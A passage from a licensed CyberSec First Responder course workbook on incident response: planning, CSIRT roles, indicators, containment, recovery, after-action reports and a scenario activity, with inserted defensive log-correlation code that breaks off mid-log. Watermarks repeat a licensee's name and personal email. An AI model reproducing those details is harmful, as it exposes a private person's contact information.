• Recover from the incident to return to normal operations as quickly as possible.
• Identify how to prevent further exploitation of the same vulnerability.
• Assess the impact and damage to systems, reputation, finances, and so forth.
• Update the organization's security policies and processes as needed, based on lessons learned
from the incident.

Documentation
The incident response plan, as well as many of the specific policies, procedures, and guidelines
detailed in this lesson, should be incorporated in your overall organizational documentation. This
will ensure that there is an official source for you and your fellow security professionals to follow.
For example, you can document existing security configuration controls. You might be able to
quickly apply these configurations to mitigate the effects of an incident, saving you the time and
trouble of creating new configurations. Or, you may be able to identify when such configurations
have failed to prevent an incident from happening and need to be improved or replaced. These
configurations can also include hardening techniques to protect systems during an attack. You
should also document baseline configurations for systems and networks, so you can compare the
current state of these assets to the baseline. By going through this preparation, it'll be easier to
identify anomalies that could indicate an incident.

Business Continuity Planning (BCP) and Disaster Recovery Planning (DRP)
Another major part of the planning process should center on recovering from a disaster or another
large-scale incident. Once you've moved to the recovery phase, you might find it incredibly difficult
—and in some cases impossible—to fully recover your systems if you didn't adequately prepare.
Business continuity plans (BCPs) and disaster recovery plans (DRPs) are both ways to prepare for
contingencies.
A business continuity plan (BCP) details exactly how an organization ought to continue day-to-day
operations in the event of a service reduction or interruption that causes at least one critical
operation to fail. These operations can be either manual or automated. Risks cannot be completely
eliminated, nor can every threat be removed, but the organization should make a serious and
organized effort to identify and manage risks to help mitigate the effects of a disaster. The BCP
addresses infrastructure issues such as maintaining utilities, using high-availability or fault-tolerant
systems that can withstand failure, and creating and maintaining offsite data backups. Ideally, this
offsite backup will be sufficiently segmented from your main operations so as to remain unaffected
by a breach or disaster. Rather than rebuilding from the ground up, you can recover quickly and
with greater ease by using this backup.

Lesson 10: Responding to Cybersecurity Incidents | Topic A

A disaster recovery plan (DRP) is a policy that defines how people and resources will be
protected in a disaster, and how the organization will recover from the disaster. In any disaster
situation, the safety of personnel is the first concern, regardless of the implications for physical and
information security. The DRP can include a list of individuals responsible for recovery, an
inventory of hardware and software, and a series of steps to take to respond to the disaster and
rebuild affected systems.
Note: You may also have existing contingency strategies in the organization. You should review
these and incorporate any parts that are still useful and relevant into your formal BCPs and
DRPs.

Site Book
A similar idea, and another good way to plan for disaster, involves creating a site book. A site book
is a document or collection of documents that take stock and inventory of all known assets,
configurations, protocols, and processes that make up a particular site. Instead of directly rebuilding
as in an offsite backup (which may not be feasible for your organization), a site book will enable you
to reconstruct your systems as they were, since no one person is likely to remember the thousands
of little intricacies in the organization's setup.
Information to include in site books:
• Hardware (serial numbers, MAC addresses, drive type/size, CPU type/speed, etc.)
• Software (operating systems, applications, scripts, add-ons, etc.)
• Network infrastructure (cabling, switches, routers, etc.)
• Physical infrastructure (power supplies, tables, chairs, shelving, etc.)
• Warranty information (dates, vendors, receipts, registration information, etc.)
• Configurations (IP addresses, organization layout, distribution, configuration files, etc.)
• Administrative credentials (user names, passwords, tokens, etc.)
Collecting and recording all this information can seem like a daunting task, so it may be best to
automate the process. Likewise, you need a process in place to update the records any time
something changes. The information in your site book will undoubtedly be highly sensitive and
mission critical in nature, so its security is paramount. Employ strong encryption to prevent this
information from leaking.
Note: Some organizations track this information in a configuration management database.


The Incident Response Process
The process of responding to an incident consists of several steps. These steps may vary from
organization to organization. NIST SP 800-61r2, Computer Security Incident Handling Guide, which is
considered one of the most authoritative sources for incident response, outlines the following
process:
1. Preparation
2. Detection and analysis
3. Containment, eradication, and recovery
4. Post-incident activity

Figure 10-1: The NIST SP 800-61r2 incident response process.

Note: The incident response process is not always one directional—you can return to other
steps if you need to, as indicated in the figure.

Security Operations Center (SOC)
A security operations center (SOC) is a location where security professionals monitor and protect
critical information assets in an organization. SOCs are vital to security management because they
centralize and streamline the organization's security efforts to maximize their effectiveness. Because
SOCs can be difficult to establish, maintain, and finance, they are usually employed by larger
organizations that must protect highly sensitive information, like a government agency or a
healthcare company that deals in personally identifiable information (PII).
SOCs, despite their differences in size, scope, and responsibility, tend to be designed with a few key
principles in mind. An SOC should be:
• Equipped to perform incident response duties.
• Supported by organizational policies, giving it the authority it needs to be effective.
• Aware of the strengths and limitations of each tool it uses.
• Aware of the nuances involved in monitoring to be able to separate the signal from the noise.
• Able to balance its size and its presence in the organization, without overstepping its bounds.
• Able to incorporate a wide variety of security processes into a single operations center.
• Prepared to leverage its strongest processes while minimizing the use of its weakest ones.
• Staffed with motivated, skilled professionals and not overstaffed with under-qualified personnel.
• Able to protect the SOC's own systems and infrastructure from attack.
• Willing to collaborate with other SOCs to share valuable information on threat intelligence and
mitigation techniques.


Cybersecurity Incident Response Team (CSIRT)
Organizations will often form a cybersecurity incident response team (CSIRT) to help identify
and manage information security incidents. The individuals that make up the CSIRT are trained in
proper collection and preservation techniques for investigating security incidents. NIST SP 800-61r2
identifies the following models for organizing such a team.

CSIRT Model | Description
Central team | One team handles incidents on behalf of the entire organization. This
approach is suitable for small organizations that are not geographically dispersed.
Distributed team | For larger or geographically dispersed organizations, it may be more
appropriate to have individual CSIRTs for different segments of the organization or different
geographic locations. The organizational reporting structure, processes, policies, and personnel
should coincide among the various teams to ensure there is a consistent response across the
organization, with information shared among the various CSIRTs.
Coordinating team | An overarching central team can be added to provide guidance and
coordination among distributed teams.

CSIRT Roles
Regardless of the organizational model, members of the CSIRT may have certain roles and
responsibilities.

Role | Responsibilities
Manager/team leader | Supervises the CSIRT and ensures all team members are performing to
the best of their capabilities.
Investigator | Attempts to discover the impact and source of an incident.
Security specialist | Provides technical support to other team members when dealing with
specialized systems.
Help desk staff | Provides technical support to employees and customers affected by an
incident.
Crisis communicator | Effectively communicates to stakeholders the important details of an
incident.
Auditor | Reviews and evaluates existing security policies, procedures, and mechanisms to
ensure they are being followed during an incident response.
Legal counsel/liaison | Assists in providing legal advice or communication to legal authorities
when an incident is deemed criminal.
Software developer | Builds and maintains tools that the CSIRT uses. May also leverage
artificial intelligence (AI) and machine learning tools.


Ongoing Training
It's true that all personnel, regardless of cybersecurity expertise, should be trained according to their
roles. This goes doubly for the CSIRT—the continuity of the business may depend upon every
member of the response team being kept up to date on the latest threats and countermeasures. A
team unprepared to combat the current threat landscape will not be running optimally, and may put
the organization in jeopardy in the face of a new type of attack. Therefore, members of the CSIRT
should undergo regular training, preferably every six months. The training regimen should not just
include an update on the threat landscape, but should also assess each member's technical aptitude
and ability to work with colleagues in a team.

External CSIRTs
Various factors may prevent your organization from forming and managing its own CSIRT. Having
yet another team to manage and support financially isn't always feasible, especially since CSIRTs
need to be ready at all times. That's why it may be in your best interest to outsource your CSIRT to
a business that specializes in incident response. Just keep in mind that it can be a challenge to
smoothly integrate an external source into your organization, so you still need to be prepared to
facilitate the CSIRT's needs when an incident does occur. If the incident transitions into a forensic
investigation, you may also need to retain the incident response provider so they can provide
thorough and accurate testimony to law enforcement. There is also a possibility that your CSIRT
will be a mix of both internal and external personnel.

A Day in the Life of a CSIRT
It might seem obvious that the daily tasks of a CSIRT would consist of responding to computer
security incidents, but in fact there are many different types of activities a CSIRT performs that may
not seem obvious from their title. Within any given day, a CSIRT member may need to perform the
following types of tasks.

Task | Description
Take immediate action in response to incidents | A first response includes taking actions such as:
• Protecting systems and networks from intruder activity.
• Implementing response or workaround strategies.
• Examining other systems and networks to find additional signs of intruder activity.
• Restoring systems and network operations, including patching, repairing, and rebuilding systems.
Perform analytical and problem-solving tasks | A first response includes analysis tasks such as:
• Identifying appropriate measures that will protect systems and networks from intruder activity.
• Monitoring or researching relevant advisories or alerts for solutions and mitigation strategies.
• Devising new response or workaround strategies as needed to deal with emerging threats.
• Identifying other operations that should be performed to detect additional related attacks.
Communicate effectively | CSIRT members often must coordinate with and call upon the expertise
and skills of others, such as:
• Other CSIRT members.
• Others within the organization, such as IT technology functions, compliance, business operations,
and facility security.
• Consultants and vendors.
Adapt to change | Members of the CSIRT must be able to adapt and think outside the box
because the cybersecurity landscape changes so rapidly.
Conduct tabletop exercises | A tabletop exercise is a meeting to discuss potential emergency
scenarios and security incidents. Members of the CSIRT consider theoretical or hypothetical
situations to come to a consensus on the appropriate responses to those situations. What the CSIRT
decides in tabletop exercises will help them when the theoretical becomes reality.
Protect evidence, privacy, and confidentiality | In the process of responding to a cybersecurity
incident, the CSIRT must be careful not to destroy evidence if a crime has occurred in connection
with the incident. The CSIRT must also be careful not to compromise data that's meant to be kept
private or confidential.


Communication within the CSIRT
Once a security incident has occurred, communication is key to carrying out the plans your
organization has developed for such cases. Having a set process for escalating communication will
facilitate the knowledge and teamwork needed to resolve the incident and bring the organization's
operations back to normal.
To develop a communication process:
1. Identify internal individuals and other trusted parties who need to be contacted in the event of a
security incident. Record this information in a call list, and ensure the list is up to date.
2. Identify external individuals who need to be contacted in the event of a security incident,
including any legal or regulatory agencies. Also record this information in a call list.
3. Determine when to notify the CSIRT members.
4. Determine when to escalate issues to more appropriate personnel, determine who those
personnel are, and how to communicate the necessary information to them (e.g., by filling out
forms/checklists, directly contacting them by phone, etc.).
5. Determine the secure channel(s) to use in primary communications.
6. Establish protocols for communicating out of band; that is, communicating through other secure
channels in case the primary channel is compromised.
7. Ensure that parties with privileged information do not release this information to untrusted
parties, whether intentionally or inadvertently.
8. Document and train individuals in the process.
9. Test the process and revise any part that fails during testing.
It's important to note that communication is not a function of one single phase; it occurs
throughout all phases of an incident, and is therefore something that you should support
continuously.

Internal and External Communication Plans
There are many different individuals with many different roles that could possibly be involved in an
incident that the CSIRT responds to. You might consider these individuals to be in the way, but you
shouldn't discount the context they can provide to the team during and after an incident. You
should therefore develop internal and external communication plans that address these individuals.
The following are some examples of internal and external stakeholders that could be relevant to
your response efforts:
• Any individual victims (beyond the company itself) that were affected by an incident:
This might include general staff or management that had their work or personal lives disrupted
by an incident. It can also include customers whose PII was stolen in a breach.
• Internal departments like HR and marketing that may need to communicate the incident
to employees and customers: You may be required by laws or regulations to disclose certain
information to affected parties.
• Stockholders: An impact to business will affect the organization's stockholders, if it is
incorporated. You may be called on to communicate to stockholders how an incident will
negatively affect profits.
• The media: Depending on the size of your organization and the impact and scope of the
incident, you may be obligated to inform the public of what happened. In these circumstances,
it's likely you'll need to go through the news media to reach as many affected parties as possible.
• The potential perpetrators of an incident: While they may deny their involvement, you can
still learn something about an incident based on their responses. Some may even confess and
provide you with crucial information, but you should consider that this information may be
inaccurate.
• Local law enforcement: The authorities can provide services to assist in your incident handling
efforts, or you may simply want to communicate the situation to them to prepare for legal action
in the future.
• System administrators: These personnel know better than anyone about the normal baseline
behavior for the network and its systems, so their input can be a great help in identifying a cause
and restoring operations.
• Managers and executives: It may be necessary to escalate certain response efforts up the chain
of command. These decision makers are ultimately in control of the organization, and incident
handling decisions that could profoundly affect operations should not be made without their
approval.
• Vendors you have a business relationship with: If an incident impacts a particular product or
group of products by one or more vendors, those vendors may be able to provide you with
support. Security vendors also offer tools and guidance to customers who may be experiencing
an incident.
• Other CSIRTs and computer emergency response teams (CERTs) that can provide
valuable intelligence that may influence your response process: The sharing of knowledge
with like-minded teams can drastically improve your efforts to identify, mitigate, and recover
from an incident.
When communicating with these parties, a little grace will go a long way. Each of your CSIRT
members should be able to keep a level head and manage conflicts, no matter the circumstances.
Treating any one of these parties poorly may undermine the success of the incident response and
investigation.

Incident Identification
Actually identifying that an incident has occurred, and what its effects are, can be the most challenging
steps in the handling and response process. This is for several reasons, including the fact that
different detection mechanisms, both manual and automated, have varying levels of sensitivity and
accuracy. The success of these mechanisms will also depend on whether a threat is known or
unknown—an attack that has no precedent will be difficult to identify in a timely manner, or may
completely sidestep detection. Another major issue is that, depending on the size of an organization
and the nature of its assets, the number of alerts security personnel receive may be so large they
cannot be easily analyzed. How to prioritize incidents in case many occur at the same time may also
be an important issue that needs solving. Lastly, it may be essential for a first responder to have very
esoteric knowledge of certain systems and the context in which those systems are put in place in the
organization. There may simply not be enough personnel with the required expertise.
Nevertheless, it is your job as a first responder to identify when a breach has occurred. To do so,
you must be on the lookout for indicators of compromise based on the data you've collected. As
you've seen, indicators of compromise (IOCs) come in many forms and come from many sources,
so it's vital that you're aware of every security asset your organization uses.

Incident Indicator Sources
The following table lists additional IOCs, both technical and non-technical, and the potential source
of each IOC.

Use this as an opportunity to provide more examples or sources, and ask students if they have any
to contribute.

Source | Indicator Example
Anti-malware software | An alert generated when a virus signature is detected on a host system.
Network intrusion detection system/network intrusion prevention system (NIDS/NIPS) | An alert
generated after an automated port scan is detected.
Host intrusion detection system/host intrusion prevention system (HIDS/HIPS) | An alert generated
after the cryptographic hash of an important file no longer matches its known, accepted value.
System logs | An entry in the Windows® event log indicates when a user has signed in to a host.
Network device logs | An entry in the firewall log indicates a dropped connection intended for a
blocked port.
Security information and event management (SIEM) | An alert is generated if anomalous behavior
is detected in any relevant logs.
Flow control device | A higher amount of traffic across the network than normal indicates an
attempted denial of service (DoS) condition.
Internal personnel | Employee testimony indicates they may have witnessed a breach in progress.
People outside the organization | An external party claiming to be responsible for an attack
indicates this is the case.
Research | Third-party research and vulnerability database information indicates a new threat that
could be targeting your organization.

The Impact and Scope of Incidents
Damage incurred in an incident can have wide-reaching consequences, including:
• Damage to data integrity and information system resources.
• Unauthorized changes and configuration of data or information systems.
• Theft of data or resources.
• Disclosure of confidential or sensitive data.
• Interruption of services and system downtime.
In addition, the impact of an incident can be both tangible and intangible. Tangible consequences
include corrupt data on a storage drive, a deleted list of clients, and stolen passwords. However,
incidents can have more intangible consequences that still cause harm to the organization. For
example, your organization may suffer economic damage by losing potential customers due to
website unavailability after a DoS attack. Your company's reputation may even be tarnished if
sensitive customer and employee data is stolen.
It is important not to underestimate the scope of an incident's impact on your organization. To
ascertain the extent of the damage, you should communicate with members of the CSIRT, as well as
other employees, to identify every dimension of the organization that could possibly be affected by
the incident. You may not be aware of every little detail of every employee's day-to-day job, so it's
important to include their perspectives in your response.

Incident Evaluation and Analysis
Incident identification and analysis efforts can be challenging. Even beyond the huge number of
alerts generated daily, many of these alerts may end up being false positives. In the analysis phase,
you must be able to separate false positives from a real indicator of an incident.
Even if an alert or log entry is not a false positive and actually indicates something adverse has
occurred, this does not necessarily mean this is the result of an incident. Servers fail, workstations
crash, and files are modified due to errors caused by both machines and humans. Yet, these do not
automatically tell you whether your organization has just suffered a significant attack or an accident.
In many cases, it comes down to your judgment as a professional and the consensus of your team.
To aid you in making these judgments, you should not only consult with other security
professionals, but you should also correlate alerts, log entries, and other potential indicators. A
strong correlation will go a long way toward either indicating an incident has occurred or convincing
you that one has not.
An incident analysis can benefit from the following:
• Document all systems within your organization, including hardware, software, utilities, and so on.
This will ensure that nothing slips past your analysis.
• Consider these systems in terms of their criticality. Incidents targeting critical systems and
processes may require a different approach to prioritization.
• Consider how the scope of an incident may impact recovery time. Complex and resource-
intensive systems may not be easily restored.
• Set a baseline for normal behavior. This way, you'll be able to compare a system as it currently
exists against the baseline configuration, and if something is off, it will be easier to analyze the
divergence.
• Retain logs from all sources. Incidents are sometimes identified months after the fact. Not
having these logs will severely impact your analysis efforts.
• Correlate events, alerts, and other potential indicators across all sources. Finding a pattern of
action that is replicated in both an NIDS and a host's system log will make it easier to determine
the method of an attack.
• Research reputable Internet sources for information. Consulting security industry websites and
security-centered forums may provide valuable insight into an incident.
• Filter out irrelevant or inconsequential sources of information. Too many sources with too much
data can complicate your efforts.
• Properly document analysis findings in a database. Being able to quickly refer back to your
previous results may help you correlate and evaluate data as efficiently as possible.
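The correlation bullet above (a pattern replicated in both an NIDS and a host's system log) is easier to see in code. The Python below is an added example, not from the CFR course: it pairs each NIDS alert with logon events on the targeted host that come from the same source address inside a time window. The log lines are a constructed key=value format, not any product's real output; the Windows event IDs 4625 (failed logon) and 4624 (successful logon) are the real ones.

```python
"""Cross-source correlation of NIDS alerts with host logon events (added
example, not from the CFR course). The line format is constructed; only
the Windows event IDs 4624/4625 are real identifiers."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample data. Only host 10.0.0.5 sees both a port scan and a
# run of logon attempts from the same address that scanned it.
NIDS_LINES = [
    "2024-03-14T02:13:05Z alert=portscan src=203.0.113.7 dst=10.0.0.5",
    "2024-03-14T02:14:10Z alert=portscan src=198.51.100.9 dst=10.0.0.8",
]
HOST_LINES = [
    "2024-03-14T02:20:40Z host=10.0.0.5 EventID=4625 user=Administrator src=203.0.113.7",
    "2024-03-14T02:20:41Z host=10.0.0.5 EventID=4625 user=Administrator src=203.0.113.7",
    "2024-03-14T02:20:43Z host=10.0.0.5 EventID=4625 user=Administrator src=203.0.113.7",
    "2024-03-14T02:21:02Z host=10.0.0.5 EventID=4624 user=Administrator src=203.0.113.7",
    "2024-03-14T09:30:00Z host=10.0.0.8 EventID=4624 user=jdoe src=10.0.0.20",
]
WINDOW = timedelta(hours=1)


def parse(line: str) -> dict:
    """Split a 'timestamp key=value ...' line into a dict with a parsed time."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["time"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return rec


def correlate(nids_lines, host_lines, window=WINDOW) -> list:
    """Return one finding per NIDS alert that is followed, within `window`,
    by logon events on the alert's destination host from the alert's source.
    Alerts with no matching host activity produce no finding."""
    logons = defaultdict(list)  # (host, src) -> [logon records]
    for rec in map(parse, host_lines):
        logons[(rec["host"], rec["src"])].append(rec)

    findings = []
    for alert in map(parse, nids_lines):
        related = [
            e for e in logons[(alert["dst"], alert["src"])]
            if alert["time"] <= e["time"] <= alert["time"] + window
        ]
        if not related:
            continue
        failures = sum(e["EventID"] == "4625" for e in related)
        successes = sum(e["EventID"] == "4624" for e in related)
        findings.append({
            "host": alert["dst"],
            "src": alert["src"],
            "alert": alert["alert"],
            "failed_logons": failures,
            "successful_logons": successes,
            "users": sorted({e["user"] for e in related}),
            # A scan, then repeated failures, then a success from the same
            # address is far stronger evidence than either source alone.
            "severity": "high" if failures and successes else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in correlate(NIDS_LINES, HOST_LINES):
        print(finding)
```

The second alert drops out because nothing on its target host ties back to the scanning address, which is exactly the kind of single-source alert the text warns may be a false positive.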

Incident Containment
The methods for containing damage when responding to a security incident are unique to the
lic

Incident Containment
incident and the organization, but the following table outlines some of the general approaches.

Containment Method: Description

Validate the incident: The first step should be to actually validate and confirm that an incident is taking place. You may be subject to false alarms, so you should be sure of what you're dealing with before you start your containment tasks.

Ensuring the safety and security of all personnel: The foremost concern of all managers involved with the security response is the safety and security of personnel. Second, facilities need to be secured. Once these are done, the CSIRT can continue on with their tasks to resolve the issue and return the organization's business functions back to normal.

Removing devices from the network when appropriate: Removing a compromised device from an organization's network may help combat a malicious code attack. By removing a device, you can stop the spread of the attack and contain it to the affected device.

Disabling communications between network devices: In the event one device has been compromised, you can disable communications to other devices to contain further damage. The CSIRT can restore communications once the device is returned to normal services.

Lesson 10: Responding to Cybersecurity Incidents | Topic A


Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 401

Disabling network user accounts: Temporarily disabling users' network accounts may prove helpful in containing damage in the event an intruder is detected within the network. Without privileges to access resources, an intruder will not be able to further damage or steal information from the organization. The CSIRT can restore user access after the intruder account is identified and terminated.

Disabling email accounts: Temporarily disabling email accounts can help keep destructive malware from infiltrating an entire network. The CSIRT can restore email once the known threat is eradicated.

Limiting access to affected subnets: Creating subnets on the network is a proactive step to contain damage by enabling you to quickly identify and disable a portion of the network without affecting the entire network.

Isolating the compromised system when appropriate: Take the compromised system offline without damaging evidence. Disconnecting the network interface preserves more evidence than powering the system down, since an abrupt shutdown destroys volatile memory and the state of running processes.

Treating the compromised system as a crime scene: While waiting for the forensic analyst to arrive, treat the system as one would any crime scene by preventing anyone from compromising the system further or destroying evidence.

Incident Mitigation and Eradication


After an incident has been identified, analyzed, and contained, you can move on to mitigating and eradicating it from your systems. This is done with the intent to stop an incident as it is occurring or shut down the negative effects an incident has left behind. In either case, you need to identify which hosts and other devices are affected, and exactly how they are affected. If, for example, you've isolated specific portions of a network on subnets to stop a computer worm from spreading, you can begin the process of removing the infection from the affected subnet. Before declaring a system clean, verify that the attacker's persistence mechanisms (added accounts, scheduled tasks, services, and startup entries) are gone as well; removing only the visible malware often leads to re-infection.

Whatever the situation may be, you must remember your primary goal as a first responder is to return your operations to normal.

Note: Depending on the incident and its effects, containment, mitigation, eradication, and recovery may all be part of the same process.

Incident Recovery
The steps you take to recover from an incident will depend greatly on the nature of the incident, as well as the ways in which you prepared for just such an incident. The following are some examples of incident recovery:

• If a malicious user deletes data from a database, you can restore that data if you had been creating backups. A continuous 1:1 replication of that data will require minimal effort on your part, but note that a continuous mirror faithfully replicates the deletion too, so it must be paired with point-in-time snapshots or transaction logs to recover from this kind of incident. Backups made in time intervals may leave some data incomplete or irrecoverable. If possible, identify what you can about the data that was lost in the period of time since the last backup was performed.
• If a distributed denial of service (DDoS) takes down your web servers, you may need to manually reboot your servers and perform a health check on them before pushing them back to live status. They should accept incoming connections gradually rather than all at once to prevent the servers from overloading again. If you identified the source or sources of the malicious traffic, you can also filter them, preferably upstream at the firewall or your provider rather than on the servers themselves.
• If an employee accidentally downloads malware onto their workstation, you can attempt to remove it with anti-malware software. If the malware persists, you may need to wipe the entire storage drive and reinstall the operating system. You can only truly recover once the malware is completely gone from the system, and the user is trained to be more security aware.

In addition to the technical aspects of disaster recovery and business continuity, the CSIRT plays a number of other roles:

• Provide leadership with information and response strategies: After an incident, the CSIRT will be concerned with recovering systems and data, how to protect them from further attack, and so forth. Meanwhile, leadership throughout the organization will consider how the incident affects their departments or functional areas, and will have to make certain decisions. The organization might have a crisis management team to coordinate an organization-wide response to crises in general. The CSIRT can provide the crisis management team (comprising decision makers throughout the organization) with useful information to help them in this process.
• Provide information needed for crisis communications: Standards and regulations may require specific communications to customers, partners, and various agencies, and good business practices will also require that you keep various parties informed, including dealing with public relations or damage control in the press and social media. As various functions within the organization communicate information internally and externally, they will look to the CSIRT for information regarding the estimated downtime, the scope of systems and data affected, and so forth.
• Provide follow-up support for customer and partner relations: Following an incident, customers and partners may have concerns about your organization's security operations. While the organization should take steps to improve security, possibly addressing areas of risk mitigation, preparedness, response, and recovery, some necessary follow-up may be a matter of public relations, with the organization looking to security operations for leadership, ideas, and information to support the effort.

The Post-Incident Phase


The last phase of the incident response process is often called the post-incident phase because it occurs after the organization has successfully recovered from the incident. An after-action report (AAR), or lessons learned report (LLR), is post-incident documentation that includes an analysis of security events and incidents that can provide insight into directions you may take to enhance security for the future.

A significant component of your post-incident documentation will be summarizing and providing a description of what happened during an incident. A description tailored to a general audience and presented at a high level might include details such as the initial investigation into the incident that determined what the issue was and what effect it was having; the impact and scope of an attack; an overall timeline log of the incident that reports what happened and when; the general actions taken to contain and mitigate the incident; and more.

There should also be a technical description of the incident that's useful to trained personnel. For example, a technical description of an attack might include the specific vectors the attack took and the specific mechanisms it used in compromising certain systems. A technical report might also include certain key logs as attachments, so trained personnel can easily validate and cross-reference the claims that are made in the report with the actual evidence.

Not only should you describe what happened during an incident and how you responded, but afterward, you should also document what this incident means for your security and how it might affect your incident response plan. Essentially, you will be identifying the elements of your security that need improving, and how you can go about improving them in the best way possible. The more you learn from your successes and mistakes, the more fine-tuned your judgment will be. This is an invaluable skill to have, especially if you're called on to solve complex, open-ended problems.


Questions to Answer in an AAR


A large part of drafting the AAR comes in answering a few simple questions. The following are just a few questions that you should ask when writing an AAR:
• What actions did you take?
• Is this the optimal solution? In other words, is the solution you used a stop-gap measure, or is this something that you could reproduce consistently and use as a policy?
• Are there more capable solutions out there?
• How did the teams react to the issue? Could they have solved the incident more quickly or efficiently?
• In the event of the same or a similar incident occurring, how would you respond differently?
• Do the answers to these questions necessitate a change in your security policy or an update to the incident response plan?
• Is there an action plan or remediation plan in place that will enable the organization to actually implement these corrective actions?

Note: Be sure to avoid assigning blame as part of the AAR. You want to encourage the CSIRT and other personnel to improve, not discourage them.

Root Cause Analysis

Another component of an AAR is root cause analysis, or the effort to determine the incident's catalyst. The most straightforward way to find the root cause is to keep asking the question, "What was the immediate thing that allowed this to happen?" With each answer, you again ask the same question, "What is the immediate thing that allowed that to happen?" You keep asking this question, working your way backwards. Typically, the root cause can be uncovered in about six questions. And typically, there will be more than one root cause.

Validation
The incident response team has a stake in whether or not the corrective actions they suggest actually get put into place. After all, they shouldn't need to save the organization from the same type of incident that could have easily been avoided. That's why some teams go through a validation process to ensure their suggested controls have the intended effect. The validation process can include verifying the organization implements security patches in vulnerable systems, reconfigures user permissions to ensure that attackers cannot easily exploit privileges, and implements a vulnerability scanning regimen. If the response team feels that it did not receive enough actionable information during an incident, they can also verify that security monitoring and logging services are up to par.

Incident Handling Tools


The CSIRT has a number of tools they can use to help handle security incidents. Keeping the toolkit up to date will contribute to the CSIRT working optimally. The following table lists a few common examples.

Instructor note: You may wish to inform students that many of these tools can also be used in a forensics context, which is covered in the next lesson.

Task: Common Tools
Create drive images: EnCase, Clonezilla, FTK Imager
Display network shares: BySoft Network Share Browser, NetShareWatcher
Manage user rights: ManageEngine ADManager Plus, Windows® Users and Groups control panel
Recover deleted data: TestDisk, PhotoRec, Foremost
Sniff/analyze network packets: Wireshark, Packetyzer, tcpdump
Crack passwords: Cain & Abel, John the Ripper
Enumerate active ports: Nmap®, Netcat

Guidelines for Deploying an Incident Handling and Response Architecture

Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the CHOICE Course screen.

Follow these guidelines when deploying an incident handling and response architecture.

Deploy an Incident Handling and Response Architecture
When deploying an incident handling and response architecture:
• Ensure all of your incident handling efforts are planned and documented ahead of time.
• Draft BCPs and DRPs to ensure you are prepared in the event of a major contingency.
• Record asset and configuration information in a site book to aid in reconstructing efforts.
• If relevant to your organization, establish a CSIRT and the roles of each member.
• Ensure there is clear communication within the CSIRT.
• Plan for communication with other internal personnel as well as external parties.
• Employ the appropriate techniques for identifying incidents as well as their potential scope and impact.
• Evaluate and analyze the effects of incidents to determine what kind of damage they can do to the organization.
• Apply appropriate techniques to contain, mitigate, and eradicate incidents.
• Begin recovery of affected systems whenever feasible.
• Draft an AAR/LLR that identifies issues and suggested improvements in the wake of an incident.
• Ensure your incident handling toolkit is up to date and complete.


up
D
ot
N
o
D

Lesson 10: Responding to Cybersecurity Incidents | Topic A


Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 405

ACTIVITY 10-1
Developing an Incident Response System

Data File
C:\CNX0013Data\Responding to Cybersecurity Incidents\NIST.SP.800-61r2.pdf

Before You Begin
You'll be using your Windows 10 client in this activity.

Scenario
One item on your to-do list is to create a formal incident response policy, but you haven't gotten around to it yet. This morning, you arrived in the office to concerns from one of your help desk personnel. She tells you Charles called to reset his domain account. He complained that he hadn't accessed it since the end of work yesterday, but it was locked when he came in this morning. What makes this concerning is that Charles is a custodian of the systems that hold plans and schematics for Develetech's products in development.

After investigating further, you find there were a number of remote access attempts on Charles' account at 11:13 p.m. last night from the IP address 67.240.182.117. While looking over the logs for the last 12 hours concerning that server, you find that Pat accessed files in the research and development system this morning at 7:43 a.m. from an internal workstation, but Pat has been on vacation for a week.

Are you under attack? If so, from where? What is the goal? You will have to develop your incident response plan on the fly this time. The National Institute of Standards and Technology (NIST) has a framework for incident response that you will lean on for your reactions to this incident.

Instructor note: Before class starts, consider printing the incident handling forms students will fill in, in case no printer is available during class. This is the start of an ongoing scenario that spans many activities.
Instructor note: If students are curious, they can download NIST publications at https://csrc.nist.gov/publications/sp.

1. Designate your CSIRT members.
a) On your Windows 10 client, from the course data files, open NIST.SP.800-61r2.pdf.
b) Go to and read Section 2.4.4 Dependencies within Organizations (page 26).

Note: You can also navigate to a section by selecting it in the table of contents.

2. What members of the organization will help you deal with the current incident? Which others would you routinely include in the CSIRT?
A: Answers will vary, but management, IT, human resources, and physical security might routinely be included here.

3. Create an initial incident report.
a) In NIST SP 800-61r2, go to Appendix B (page 67 overall, page 58 as indicated on the page).
b) Review the Incident Details list.

4. Which of these questions can you answer now?
A: Answers will vary, but might include basics of the event, timestamps, some locations (internal at least), and the fact the incident is unsolved.

5. What additional questions would you ask about the incident based on what you know so far?
A: Answers will vary, but they might include: Who is in the office today? What files were taken? Is there any evidence of proprietary information being posted publicly?

6. Fill out an incident response form.
a) Using your browser, navigate to https://www.sans.org/score/incident-forms.
b) In the list of incident handling forms, select Incident Handling Forms - Incident Identification and open the PDF.

Note: Your instructor may have you work in groups to complete the form, and might ask for a volunteer to share a completed example.

c) Fill in the form to the best of your knowledge.

7. Close the web browser.

Instructor note: Hand out the forms you printed earlier, or have students print their own, assuming a printer is available. Otherwise, you may need to have students simply brainstorm ideas instead of recording them on the form. Consider having the class work together on filling out the form, rather than each student completing their own. If students fill in their own, have them share their results with the class. Since there isn't necessarily a strong link yet between the failed access attempts on Charles' account and Pat's successful access attempt, students may choose to treat these as two separate incidents. Feel free to let students investigate any of the other forms.
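The scenario in this activity is a small correlation exercise in its own right: the failed remote attempts on Charles' account and Pat's access during a vacation only become indicators when the authentication log is read alongside a second source (the HR leave roster). The following Python is an added example, not part of the course or its data files. The log excerpt and its "timestamp host source EVENT key=value" format, the internal addresses, and the leave roster are constructed for the example; the external IP address and the times are taken from the scenario text. The third rule only proposes that the two indicators belong to one incident, which matches the caution in the instructor note that the link is not yet proven.

```python
"""Correlate authentication and file-access events with HR context.

Added example based on the activity scenario; not part of the CFR course or
its data files. The log format ("timestamp host source EVENT key=value"),
the internal addresses and the leave roster are constructed; the external
IP and the times come from the scenario.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

LOG = """\
2019-04-10T23:13:02 rd-fileserver-01 auth FAIL user=charles src=67.240.182.117 proto=rdp
2019-04-10T23:13:09 rd-fileserver-01 auth FAIL user=charles src=67.240.182.117 proto=rdp
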